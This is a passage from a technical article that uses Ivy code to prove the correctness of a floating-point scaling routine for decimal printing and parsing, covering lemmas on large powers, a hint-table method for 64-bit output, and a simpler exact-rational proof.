We can see that most powers are problematic for <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>=</mo><mn>64</mn></mrow></math>,
which is why we’re not trying to prove that general case.
<p>
Let’s make it possible to filter the table down to just the bad powers:
<pre class='language-ivy'>op sel x = x sel iota count x
op bad table = table[sel table[;4] != 0]
short show bad 64 64 check seq -400 400
-- out --
-400 0x95fe7e07c91efafa3931b850df08e739 0xe4036416c4b21bd6 0x0 ❌
-399 0xbb7e1d89bb66b9b8c77e266516cb2107 0xe4036416c4b21bd6 0x0 ❌
-398 0xea5da4ec2a406826f95daffe5c7de949 0xe4036416c4b21bd6 0x0 ❌
-397 0x927a87139a6841185bda8dfef9ceb1ce 0xfcdbd01bdf2d3eb2 0x0 ❌
-395 0xe4df730ea142e5b60f857dde6652f5d1 0x99535e222a18bc6d 0x0 ❌
... ... ... ... ...
395 0x8f2bd39f334827e8c5874cc0ec691ba0 0xa462c66df06d90e3 0x0 ❌
397 0xdfb47aa8c020be5bb4a367ed71643b2a 0x90ae62dc5a2282dd 0x0 ❌
398 0x8bd0cca9781476f950e620f466dea4fb 0xd0be819cb0f1092e 0x0 ❌
399 0xaec4ffd3d61994b7a51fa93180964e39 0xa6fece16f3f40758 0x0 ❌
400 0xda763fc8cb9ff9e58e67937de0bbe1c7 0x8598a4df299005e0 0x0 ❌
</pre>
<p>
Now we have everything we need. Let’s write a function to try to prove
that <code>scale</code> is correct for a given <math><mi>b</mi></math> and <math><mi>m</mi></math>.
<pre class='language-ivy'>op prove (b m) =
table = bad b m check (seq -400 -28), (seq 28 400)
what = 'b=', (text b), ' m=', (text m), ' t=', (text 127-m), '+½'
(count table) == 0: print '✅ proved ' what
print '❌ disproved' what
print short show table
</pre>
<p>
This function builds a table of all the bad powers for <math><mrow><mi>b</mi><mo>,</mo><mi>m</mi></mrow></math>.
If the table is empty, it prints that the settings have been proved.
If not, it prints that the settings are unproven
and prints some of the questionable powers.
<p>
If we try to prove <math><mrow><mn>64</mn><mo>,</mo><mn>64</mn></mrow></math>, we get many unproven powers.
<pre class='language-ivy'>prove 64 64
-- out --
❌ disproved b=64 m=64 t=63+½
-400 0x95fe7e07c91efafa3931b850df08e739 0xe4036416c4b21bd6 0x0 ❌
-399 0xbb7e1d89bb66b9b8c77e266516cb2107 0xe4036416c4b21bd6 0x0 ❌
-398 0xea5da4ec2a406826f95daffe5c7de949 0xe4036416c4b21bd6 0x0 ❌
-397 0x927a87139a6841185bda8dfef9ceb1ce 0xfcdbd01bdf2d3eb2 0x0 ❌
-395 0xe4df730ea142e5b60f857dde6652f5d1 0x99535e222a18bc6d 0x0 ❌
... ... ... ... ...
395 0x8f2bd39f334827e8c5874cc0ec691ba0 0xa462c66df06d90e3 0x0 ❌
397 0xdfb47aa8c020be5bb4a367ed71643b2a 0x90ae62dc5a2282dd 0x0 ❌
398 0x8bd0cca9781476f950e620f466dea4fb 0xd0be819cb0f1092e 0x0 ❌
399 0xaec4ffd3d61994b7a51fa93180964e39 0xa6fece16f3f40758 0x0 ❌
400 0xda763fc8cb9ff9e58e67937de0bbe1c7 0x8598a4df299005e0 0x0 ❌
</pre>
<a class=anchor href="#large_powers_printing"><h2 id="large_powers_printing">Large Powers, Printing</h2></a>
<p>
For printing, we need to prove <math><mrow><mi>b</mi><mo>=</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>=</mo><mn>66</mn></mrow></math>.
<pre class='language-ivy'>prove 55 66
-- out --
✅ proved b=55 m=66 t=61+½
</pre>
<p>
It works! In fact we can shorten the middle to 64 bits
before things get iffy:
<pre class='language-ivy'>prove 55 66
prove 55 65
prove 55 64
prove 55 63
prove 55 62
-- out --
✅ proved b=55 m=66 t=61+½
✅ proved b=55 m=65 t=62+½
✅ proved b=55 m=64 t=63+½
❌ disproved b=55 m=63 t=64+½
167 0xd910f7ff28069da41b2ba1518094da05 0x7b6e56a6b7fd53 0x0 ❌
❌ disproved b=55 m=62 t=65+½
167 0xd910f7ff28069da41b2ba1518094da05 0x7b6e56a6b7fd53 0x0 ❌
201 0xd106f86e69d785c7e13336d701beba53 0x68224666341b59 0x1 ❌
211 0xf356f7ebf83552fe0583f6b8c4124d44 0x69923a6ce74f07 0x0 ❌
</pre>
<div class=lemma id=lemma9>
<p>
<b>Lemma 9</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. We calculated above that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>. By <a href="#lemma4">Lemma 4</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#large_powers_parsing"><h2 id="large_powers_parsing">Large Powers, Parsing</h2></a>
<p>
For parsing, we want to prove <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>=</mo><mn>73</mn></mrow></math>.
<pre class='language-ivy'>prove 64 73
-- out --
✅ proved b=64 m=73 t=54+½
</pre>
<p>
It also works! But we’re right on the edge.
Shortening the middle by one bit breaks the proof:
<pre class='language-ivy'>prove 64 73
prove 64 72
-- out --
✅ proved b=64 m=73 t=54+½
❌ disproved b=64 m=72 t=55+½
-93 0x857fcae62d8493a56f70a4400c562ddc 0xf324bb0720dbe7fe 0x1 ❌
</pre>
<div class=lemma id=lemma10>
<p>
<b>Lemma 10</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. We calculated above that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>. By Lemma 4, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#bonus"><h2 id="bonus">Bonus: 64-bit Input, 64-bit Output?</h2></a>
<p>
We don’t need full 64-bit input and 64-bit output, but if we did,
there is a way to make it work at only a minor performance cost.
It turns out that for 64-bit input and 64-bit output,
for any given <math><mi>p</mi></math>, considering all the inputs <math><mi>x</mi></math> that cause <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>,
either all the middles overflowed or none of them did.
So we can use a lookup table to decide how to interpret <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>.
<p>
The implementation steps would be:
<ol>
<li>
Note that the proofs remain valid without <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
Don’t make use of the <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math> optimization in the <code>uscale</code> implementation.
<li>
When <math><mi>p</mi></math> is large, force the sticky bit to 1
instead of trying to compute it from <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>.
<li>
When <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math> for a large <math><mi>p</mi></math>, consult a table of hint bits
indexed by <math><mi>p</mi></math> to decide whether <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> has overflowed.
If so, decrement <math><MI>𝑡𝑜𝑝</MI></math>.</ol>
<p>
Here is a proof that this works.
<p>
First, define <code>topdiff</code>, which computes the difference between <math><MI>𝑡𝑜𝑝</MI></math> and <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> for a given <math><mrow><mi>b</mi><mo>,</mo><mi>m</mi><mo>,</mo><mi>p</mi></mrow></math>.
<pre class='language-ivy'># topdiff computes top - topℝ.
op (b m p) topdiff x =
top = (x * pm p) >> b+m
topℝ = (floor x * (10**p) / 2**pe p) >> b+m
top - topℝ
</pre>
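<p>
Before defining the hint computation itself, we can sanity-check <code>topdiff</code> on the error-carry example from earlier (<math><mrow><mi>p</mi><mo>=</mo><mn>62</mn></mrow></math>), where the computed top was one too big:
<pre class='language-ivy'>(64 64 62 topdiff 0xd5bc71e52b31e483) is 1
</pre>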
<p>
Next, define <code>hint</code>, which is like <code>check1</code>
in that it looks for counterexamples.
When it finds counterexamples, it computes <code>topdiff</code>
for each one and reports whether
they all match, and if so what their value is.
<pre class='language-ivy'># (b m) hint p returns (p pm x middle fail) where pm is (pm p).
# If there is a counterexample to p, x is the first one,
# middle is (x*pm)'s middle bits, and fail is 1, 2, or 3:
# 1 if all counterexamples have top = topR
# 2 if all counterexamples have top = topR+1
# 3 if both kinds of counterexamples exist or other counterexamples exist
# If there is no counterexample, x middle fail are 0 0 0.
op (b m) hint p =
x = modmin (2**b-1) ((2**b)-1) (pm p) (2**b+m)
middle = ((x * pm p) mod 2**b+m) >> b
middle >= 1: p (pm p) x middle 0
all = modfindall (2**b-1) ((2**b)-1) (pm p) (2**b+m) 0 ((2**b)-1)
diffs = b m p topdiff@ all
equal = or/ diffs == 0
carry = or/ diffs == 1
other = ((count all) >= 100) or or/ (diffs != 0) and (diffs != 1)
p (pm p) x middle ((1*equal)|(2*carry)|(3*other))
</pre>
<p>
Finally, define <code>hints</code>, which is like <code>show check</code>.
It gets the hint results for all large <math><mi>p</mi></math> and
prints a summary of how many were in four categories:
no hints needed, all hints 0, all hints 1, mixed hints.
<pre class='language-ivy'>op hints (b m) =
table = mix b m hint@ (seq -400 -28), (seq 28 400)
(box 'b=', (text b), ' m=', (text m)), (+/ mix table[;4] ==@ iota 4)
</pre>
<p>
Now we can try <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>=</mo><mn>64</mn></mrow></math>:
<pre class='language-ivy'>hints 64 64
-- out --
b=64 m=64 452 184 110 0
</pre>
<p>
The output says that 452 powers don’t need hints,
184 need a hint that <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑡𝑜𝑝</MI></mrow></math>,
and 110 need a hint that <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑡𝑜𝑝</MI><mo>−</mo><mn>1</mn></mrow></math>.
Crucially, 0 need conflicting hints,
so the hinted algorithm works for <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>=</mo><mn>64</mn></mrow></math>.
<p>
Of course, that leaves 64 top bits, and since one bit is the ½ bit,
this is technically only a 63-bit result.
(If you only needed a truncated 64-bit result instead of a rounded one,
you could use <math><mrow><mi>e</mi><mo>−</mo><mn>1</mn></mrow></math> and
read the ½ bit as the final bit of the truncated result.)
<p>
It turns out that hints are not enough to get a full 64 bits plus a ½ bit,
which would leave a 63-bit middle.
In that case, there turn out to be 63 powers where <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math> is ambiguous:
<pre class='language-ivy'>hints 64 63
-- out --
b=64 m=63 241 283 159 63
</pre>
<p>
However, if you only have 63 bits of input, then you can have the full 64-bit output:
<pre class='language-ivy'>hints 63 64
-- out --
b=63 m=64 601 86 59 0
</pre>
<a class=anchor href="#completed_proof"><h2 id="completed_proof">Completed Proof</h2></a>
<div class=lemma id=theorem1>
<p>
<b>Theorem 1</b>. For the cases used in the printing and parsing algorithms, namely <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math> with (printing) <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math> and (parsing) <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mtext>Scale</mtext></math> is correct and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. We proved these five cases:
<ul>
<li>
<p>
<a href="#lemma3">Lemma 3</a>. For exact results, <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma7">Lemma 7</a>. For inexact results and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma8">Lemma 8</a>. For inexact results, <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma9">Lemma 9</a>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<li>
<p>
<a href="#lemma10">Lemma 10</a>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.</ul>
<p>
The result follows directly from these. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#simpler_proof"><h2 id="simpler_proof">A Simpler Proof</h2></a>
<p>
The proof we just finished is the most precise analysis we can do.
It enables tricks like the hint table for 64-bit input and 64-bit output.
However, for printing and parsing, we don’t need to be quite that precise.
We can reduce the four inexact cases to two
by analyzing the exact <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> values instead of our
rounded <math><MI>𝑝𝑚</MI></math> values.
We will show that the spacing around the exact integer
results is wide enough that
results that are not exact integers can't have middles near <math><mn>0</mn></math> or <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup></mrow></math>.
The idea of proving a minimal spacing around the exact integer results
is due to Michel Hack,
although the proof is new.
<p>
Specifically, we can use the same machinery we just built to prove that
<math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math> for
inexact results with <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>,
eliminating the need for <a href="#lemma7">Lemmas 7 and 8</a> by
generalizing <a href="#lemma9">Lemmas 9 and 10</a>.
To do that, we analyze the non-zero results
of <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup></mrow></math>.
(If that expression is zero, the result is exact,
and we are only analyzing the inexact case.)
<p>
Let’s start by defining <code>gcd</code> and <code>pmR</code>, which returns <code>pn pd</code>
such that <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑝𝑛</MI><mn>/</mn><MI>𝑝𝑑</MI></mrow></math>.
<pre class='language-ivy'>op x gcd y =
not x*y: x+y
x > y: (x mod y) gcd y
x <= y: x gcd (y mod x)
(15 gcd 40) is 5
</pre>
<pre class='language-ivy'>op pmR p =
e = pe p
num = (10**(0 max p)) * (2**-(0 min e))
denom = (10**-(0 min p)) * (2**(0 max e))
num denom / num gcd denom
(pmR -5) is (2**139) (5**5)
</pre>
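<p>
As a sanity check (illustrative only; <code>pmcheck</code> is a throwaway helper), the rounded mantissa <code>pm p</code> is just the exact <math><mrow><MI>𝑝𝑛</MI><mn>/</mn><MI>𝑝𝑑</MI></mrow></math> rounded up to an integer:
<pre class='language-ivy'># pm p = ceil pn/pd, where pn pd = pmR p.
op pmcheck p =
 pn pd = pmR p
 (pm p) is ceil pn/pd
pmcheck -5
pmcheck 200
</pre>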
<p>
Let’s also define a helper <code>zlog</code> that is like <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>|</mn><mi>x</mi><mn>|</mn></mrow></math>
except that <code>zlog 0</code> is 0.
<pre class='language-ivy'>op zlog x =
x == 0: 0
2 log abs x
(zlog 4) is 2
(zlog 0) is 0
</pre>
<p>
Now we can write an exact version of <code>check1</code>.
We want to analyze <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup></mrow></math>,
but to use integers, instead we analyze
<math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑛</MI><MO>mod</MO><MI>𝑝𝑑</MI><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup></mrow></math>.
We find the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with minimal <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>></mo><mn>0</mn></mrow></math>
and the <math><mrow><mi>y</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with maximal <math><mrow><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
Then we convert those to <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> values by
dividing by <math><mrow><MI>𝑝𝑑</MI><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>.
<pre class='language-ivy'>op (b m) check1R p =
pn pd = pmR p
xmin = 2**b-1
xmax = (2**b)-1
M = pd * 2**b+m
x = modminge xmin xmax pn M 1
x < 0: p 0 0 0 0
y = modmax xmin xmax pn M
xmiddle ymiddle = float ((x y * pn) mod M) / pd * 2**b
 p x y xmiddle ((xmiddle < 2) or (ymiddle > (2**m)-2))
op (b m) checkR ps = mix b m check1R@ ps
show1 64 64 check1 200
show1 64 64 check1R 200
-- out --
200 0xa738c6bebb12d16cb428f8ac016561dc 0xffe389b3cdb6c3d0 0x34 .
200 0xffe389b3cdb6c3d0 0x8064104249b3c03e 0x1.9c2145p+05 .
</pre>
<pre class='language-ivy'>op proveR (b m) =
table = bad b m checkR (seq -400 400)
what = 'b=', (text b), ' m=', (text m), ' t=', text ((127-1)-m),'+½'
(count table) == 0: print '✅ proved ' what
print '❌ disproved' what
print short show table
</pre>
<pre class='language-ivy'>proveR 55 66
proveR 55 62
proveR 64 73
proveR 64 72
-- out --
✅ proved b=55 m=66 t=60 + ½
❌ disproved b=55 m=62 t=64 + ½
167 0x7b6e56a6b7fd53 0x463bc17af3f48e 0x1.817b1cp-02 ❌
201 0x68224666341b59 0x588220995c452a 0x1.8e0a91p-02 ❌
211 0x69923a6ce74f07 0x597216983bdc1a 0x1.14fbd3p-03 ❌
221 0x404a552daaaeea 0x50ad765f4fd461 0x1.de3812p+00 ❌
✅ proved b=64 m=73 t=53 + ½
❌ disproved b=64 m=72 t=54 + ½
-93 0xf324bb0720dbe7fe 0xc743006eaf2d0e4f 0x1.3a8eb6p+00 ❌
</pre>
<p>
The failures that <code>proveR</code> finds mostly correspond to the failures
that <code>prove</code> found,
except that <code>proveR</code> is slightly more conservative: the reported failure
for <math><mrow><mi>p</mi><mo>=</mo><mn>221</mn></mrow></math> is a false positive.
<pre class='language-ivy'>prove 55 66
prove 55 62
prove 64 73
prove 64 72
-- out --
✅ proved b=55 m=66 t=61+½
❌ disproved b=55 m=62 t=65+½
167 0xd910f7ff28069da41b2ba1518094da05 0x7b6e56a6b7fd53 0x0 ❌
201 0xd106f86e69d785c7e13336d701beba53 0x68224666341b59 0x1 ❌
211 0xf356f7ebf83552fe0583f6b8c4124d44 0x69923a6ce74f07 0x0 ❌
✅ proved b=64 m=73 t=54+½
❌ disproved b=64 m=72 t=55+½
-93 0x857fcae62d8493a56f70a4400c562ddc 0xf324bb0720dbe7fe 0x1 ❌
</pre>
<div class=lemma id=lemma11>
<p>
<b>Lemma 11</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Our Ivy code <code>proveR 55 66</code> confirmed that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>.
By <a href="#lemma5">Lemma 5</a> and <a href="#lemma6">Lemma 6</a>,
<math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
<div class=lemma id=lemma12>
<p>
<b>Lemma 12</b>. For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, and <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Our Ivy code <code>proveR 64 73</code> confirmed that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>.
